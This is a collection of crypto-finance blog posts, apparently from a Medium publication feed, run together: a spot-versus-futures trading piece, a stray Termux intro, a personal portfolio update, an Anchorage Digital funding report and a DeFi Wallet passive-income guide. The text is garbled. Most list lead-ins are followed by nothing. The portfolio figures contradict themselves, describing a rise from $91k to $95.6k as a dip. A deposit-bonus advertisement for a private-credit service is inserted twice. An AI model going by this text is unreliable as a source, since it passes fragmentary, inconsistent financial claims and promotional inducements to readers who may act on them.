Smart money values emotional control as much as strategy.
Despite its strengths, spot trading isn’t perfect.
To generate meaningful returns, spot traders must deploy significant capital. A 20% move requires 100% capital exposure.
For institutions seeking capital efficiency, this can be a constraint.
Spot markets make shorting difficult or impossible without borrowing assets, which adds complexity and counterparty risk.
This is where futures enter the conversation.
Pro Insight: Most traders lose money not because of bad markets — but because they choose the wrong tool.
Are you servicing a high-interest debt or want better savings?
Private credit is becoming the new income solution. Get $300 on first deposit with Insidefinacent. Here’s how it works.
Binance Futures allows traders to speculate on the price of cryptocurrencies using derivative contracts rather than owning the underlying asset.
Key characteristics include:
Smart money overwhelmingly prefers USDT‑margined perpetual futures due to liquidity and simplicity.
Contrary to popular belief, professionals do not use futures primarily to gamble with high leverage.
One of the most common professional strategies is spot‑futures hedging.
Example:
This allows smart money to:
Futures require far less capital than spot positions. This allows funds to:
Futures markets are ideal for:
These strategies are difficult to execute efficiently on spot markets.
Smart money often aims for delta‑neutral returns — profits regardless of market direction.
This is only possible with futures.
Leverage magnifies both gains and losses. Poor risk management leads to forced liquidation — the #1 reason retail traders fail.
Holding futures positions during crowded trades can result in significant funding payments, silently eroding profits.
Leverage amplifies stress, leading to:
Smart money survives by avoiding these traps.
Want the full smart‑money playbook? This article is part of a series focused on how professionals actually trade crypto — not what influencers sell.
Save this article so you can revisit these frameworks before your next trade.
The honest answer: both — but strategically.
They do not:
They focus on risk‑adjusted returns, not screenshots.
Avoiding these mistakes immediately puts you ahead of 90% of traders.
Ask yourself:
If unsure, start with spot.
Professionals often run hybrid strategies, such as:
This layered approach reduces risk while maximizing opportunity.
Spot trading builds wealth. Futures trading manages and enhances it.
Smart money doesn’t choose sides — it chooses structure, discipline, and survivability.
If your goal is long‑term success rather than short‑term excitement, the path is clear:
That’s where smart money actually trades.
If this guide helped sharpen your understanding of Spot vs Futures on Binance, do clap and save. Your future self will thank you before your next trade.
This isn’t content for gamblers.
It’s for traders who want to stay in the game long enough to win.
Spot vs Futures on Binance: Where Should Smart Money Actually Trade? was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.
Termux is an incredibly powerful terminal emulator for Android. I previously showed you how to use it to download any media file, convert files, or ssh into another device. However, that barely scratched the surface. Here are even more awesome things you can do with a terminal window on your phone.
Mixed bag this week in crypto markets: BTC edged down slightly overall (from ~$91k to ~$95.6k ), while altcoins like SUI (+20–31% ) and XRP surged. Your portfolio (BTC, ETH, SUI, AERO, XRP) stayed positive on average, buoyed by SUI/XRP strength amid BTC stability around 95–97k. 📈
Portfolio benefited from altcoin rotation away from BTC dominance.
Coin Weekly Change/Volatility Key Swings Note BTC -0.58% to +5% 91k → 97k USD Stable, mild dip ETH -2% to +3% 3.200–3.500 USD Consolidation SUI +20–31% 1.5 → 1.8–2 USD Top winner 🚀 AERO Neutral No big moves Following alt trend XRP +21% → 2.1 USD BTC rotation play
Moderate bullish momentum emerging.
Gold in bearish correction toward $4,235 support post-ATH, eyeing rally above $5,165. RSI trendline backs upside amid geopolitics fueling long-term bull.
DeFi portfolio grinding higher with minimal new capital.
Metric Value Total Value ~$8,550–8,650 USD Concentration BTC-derivs + BTC/USDC CLM Weighted APY ~18–20% annual Yield Sources Uniswap v3 BTC CLM, PancakeSwap vaults, Aerodrome vLP, Morpho/Beefy
Yields stable from fees/compounding.
Category Last Week Now Change Total Value ~$8,700 $8,927 +$227 (+2.6%) Est. Daily Yield ~$3.7–4.0 ~$3.8 Stable Accrued Yield (Lifetime) ~$1,691 $1,738 +$47 net
Notes: Growth from yields + mild BTC/ETH price lifts. Lower volatility, better range-resilience. Risk down, IL pressure eased. Subjective score: 8.2/10 (up from 7.5).
Portfolio up ~2.6% in a week, holding steady daily cashflow (~$3.8). APY isn’t sky-high, but structure is mature, less volatile, and sustainable — less action, more results.
🧠 Final Take:
Thoughts on SUI ETF buzz or XRP’s win? Comment below! 👇
🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑
Disclaimer:
This post is just my personal opinion and ideas. I am not promoting or recommending any cryptocurrency or investment. Please do your own research and be careful when investing. Any decisions you make are at your own risk.
🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑
💼 Jan 2026 Portfolio Update: Stable 18–20% APY Amid BTC Consolidation was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.
Anchorage Digital, a New York–based crypto bank, is moving to raise fresh capital as it prepares to enter public markets. According to Bloomberg, people familiar with the matter say the firm is looking to secure between $200 million and $400 million in new funding.
Reports say the Firm is exploring a $200M–$400 million round to strengthen its business before a possible public listing. The plan would put Anchorage among a small group of crypto-native companies that have tried to list on stock markets after building regulated services for institutions.
The company’s bank affiliate holds a federal charter, a status that gives it a different footing compared with many crypto firms. That federal backing is often cited by investors as a reason Anchorage can offer custody and other services seen as safer by big clients.
Based on reports, Anchorage last raised capital in a previous round that valued the business at over $3 billion, and the fresh funding is viewed as a runway toward a public debut.
Anchorage Digital, whose affiliate is the first federally chartered US digital-asset bank, is seeking to raise fresh capital as it explores a potential public listing, according to people with knowledge of the matter https://t.co/6xLNEJN54W
— Bloomberg (@business) January 16, 2026
Some reports say the bank is also growing teams tied to stablecoin work and exploring partnerships that would widen its product set for large customers. These moves appear aimed at making the company more attractive to public investors.
Market observers note that crypto firms have been considering public listings more often as regulation clears up in certain areas and as institutional demand for custody and regulated rails grows.
Anchorage’s timing comes while other custody and asset firms weigh similar steps, a trend that could reshape how big investors access crypto services. The atmosphere is cautious, but there is clear interest in regulated players.
Market Reaction And IPO TimingAccording to market chatter, the bank could seek a listing as soon as next year, although some coverage says 2027 is also possible. Sources quoted by Bloomberg gave a range of potential timing, and Anchorage has not provided a public comment on the plans.
If Anchorage completes a successful raise and goes public, the event would signal confidence in firms that combine crypto services with bank-style oversight.
Investors will be watching how the company uses the proceeds — whether to build new products, hire staff, or boost its balance sheet ahead of scrutiny that comes with public ownership. The next few months are likely to reveal more details as underwriting and investor talks advance.
Featured image from Yellow, chart from TradingView
What if your crypto could work for you — 24/7 — without relying on banks, brokers, or savings accounts that barely beat inflation?
In a world where traditional interest rates struggle to keep up with rising living costs, decentralized finance (DeFi) has emerged as a powerful alternative for investors seeking passive income, portfolio diversification, and long-term wealth building.
One of the most beginner-friendly yet powerful gateways into this ecosystem is Crypto.com’s DeFi Wallet.
Unlike centralized platforms that control your funds, Crypto.com DeFi Wallet gives you full ownership of your assets, while still offering access to staking, yield farming, liquidity pools, and on-chain rewards — all from a single mobile interface.
In this step-by-step guide, you’ll learn exactly how to use Crypto.com’s DeFi Wallet to generate passive income, even if you’re new to DeFi. We’ll cover setup, security, earning strategies, risk management, and how to maximize yields responsibly.
Whether your goal is earning yield on idle crypto, reducing reliance on traditional debt-based systems, or building decentralized income streams, this guide is designed to help you do it safely and strategically.
Crypto.com’s DeFi Wallet is a non-custodial cryptocurrency wallet that allows users to earn passive income through staking, DeFi lending, liquidity pools, and yield protocols while maintaining full control of their private keys.
Unlike centralized platforms, the wallet connects directly to decentralized finance applications (dApps), enabling on-chain rewards without intermediaries.
Building passive income with crypto is a skill — not a gamble.
Follow this publication to learn how professionals use DeFi, staking, and yield strategies to grow income, protect capital, and reduce reliance on traditional banks — without falling for hype or scams.
Yes, Crypto.com’s DeFi Wallet allows users to earn passive income by staking CRO, earning yield on stablecoins, providing liquidity to DeFi pools, and lending crypto assets through decentralized protocols — all while retaining self-custody.
Returns vary based on market conditions and protocol risk.
Traditional savings accounts often offer negative real returns after inflation. DeFi flips this model by allowing users to earn yield directly from blockchain activity.
Crypto.com’s DeFi Wallet acts as a bridge between beginners and advanced DeFi strategies, making it ideal for investors who want passive income without unnecessary complexity.
Important Security Note:
Your recovery phrase is your money. Lose it, and your funds are gone forever.
To earn passive income, you need assets inside your wallet.
Popular assets for passive income:
Each asset offers different yield opportunities, risk levels, and lock-up terms.
Crypto.com’s DeFi Wallet supports multiple income-generating strategies, each with different risk-reward profiles.
The most popular passive income methods include:
Each strategy offers different risk levels, yield potential, and liquidity conditions.
By staking CRO, you help secure the Cronos network and earn staking rewards in return.
Typical APYs fluctuate based on network conditions, but CRO staking remains one of the most stable DeFi income options.
If you prefer income without price swings, stablecoins are your friend.
This approach is especially attractive for investors focused on debt reduction, cash-flow stability, or income replacement strategies.
Stablecoin yield strategies are generally less volatile than crypto staking because they are pegged to fiat currencies like the U.S. dollar. However, they still carry smart contract and protocol risk.
Stablecoins are often used for income stability and capital preservation.
Save this guide before you move on.
This step-by-step walkthrough is designed to be reused as you set up your DeFi wallet, choose staking options, and compare yield strategies. Saving now prevents costly mistakes later.
Liquidity pools allow you to earn:
Example:
Providing CRO/USDC liquidity on Cronos dApps.
This strategy is best for experienced investors who understand DeFi mechanics and risk management.
Impermanent loss occurs when the price of tokens in a liquidity pool changes compared to holding them individually, potentially reducing overall returns despite earning trading fees.
It is a key risk factor when providing liquidity in DeFi protocols.
Some DeFi platforms allow you to lend your crypto to borrowers and earn interest.
Ideal Assets:
This method closely resembles traditional interest-based finance, but without banks acting as middlemen.
Crypto.com’s DeFi Wallet includes a Web3 browser, giving access to vetted DeFi protocols.
How to Use It:
Always:
Crypto.com’s DeFi Wallet is considered secure because it is non-custodial, open-source, and requires users to manage their own private keys.
Security ultimately depends on user practices, such as protecting recovery phrases and avoiding unverified DeFi apps.
Passive income doesn’t mean risk-free income.
Think of DeFi as a portfolio tool, not a lottery ticket.
Compound interest remains one of the most powerful wealth-building forces — especially in DeFi.
Avoiding these mistakes alone can dramatically improve long-term returns.
Are you servicing a high-interest debt or have low savings?
Private credit is becoming the new income solution. Get $300 on first deposit with Insidefinacent. See how it works.
Security depends largely on user behavior.
Safety Strengths:
Your biggest risk isn’t the wallet — it’s poor operational security.
This wallet is ideal for:
If you’re serious about earning passive income with crypto, Crypto.com’s DeFi Wallet offers a balanced entry point into decentralized finance.
It combines:
In a financial system increasingly defined by inflation, debt, and centralized control, learning how to generate decentralized income is no longer optional — it’s strategic.
Step-by-Step: How to Use Crypto.com’s DeFi Wallet for Passive Income was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.
